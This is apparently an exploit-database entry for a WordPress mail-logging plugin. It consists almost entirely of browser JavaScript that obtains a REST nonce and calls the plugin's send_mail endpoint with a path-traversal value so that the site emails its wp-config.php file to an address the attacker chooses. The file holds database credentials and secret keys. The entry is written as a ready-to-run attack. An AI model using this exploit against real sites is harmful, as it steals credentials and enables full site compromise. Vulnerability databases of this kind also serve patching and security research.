Share
## https://sploitus.com/exploit?id=WPEX-ID:7C1DFF5B-BED3-49F8-96CC-1BC9ABE78749
Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com&includeAttachment={"../../wp-config.php":1}'})).text();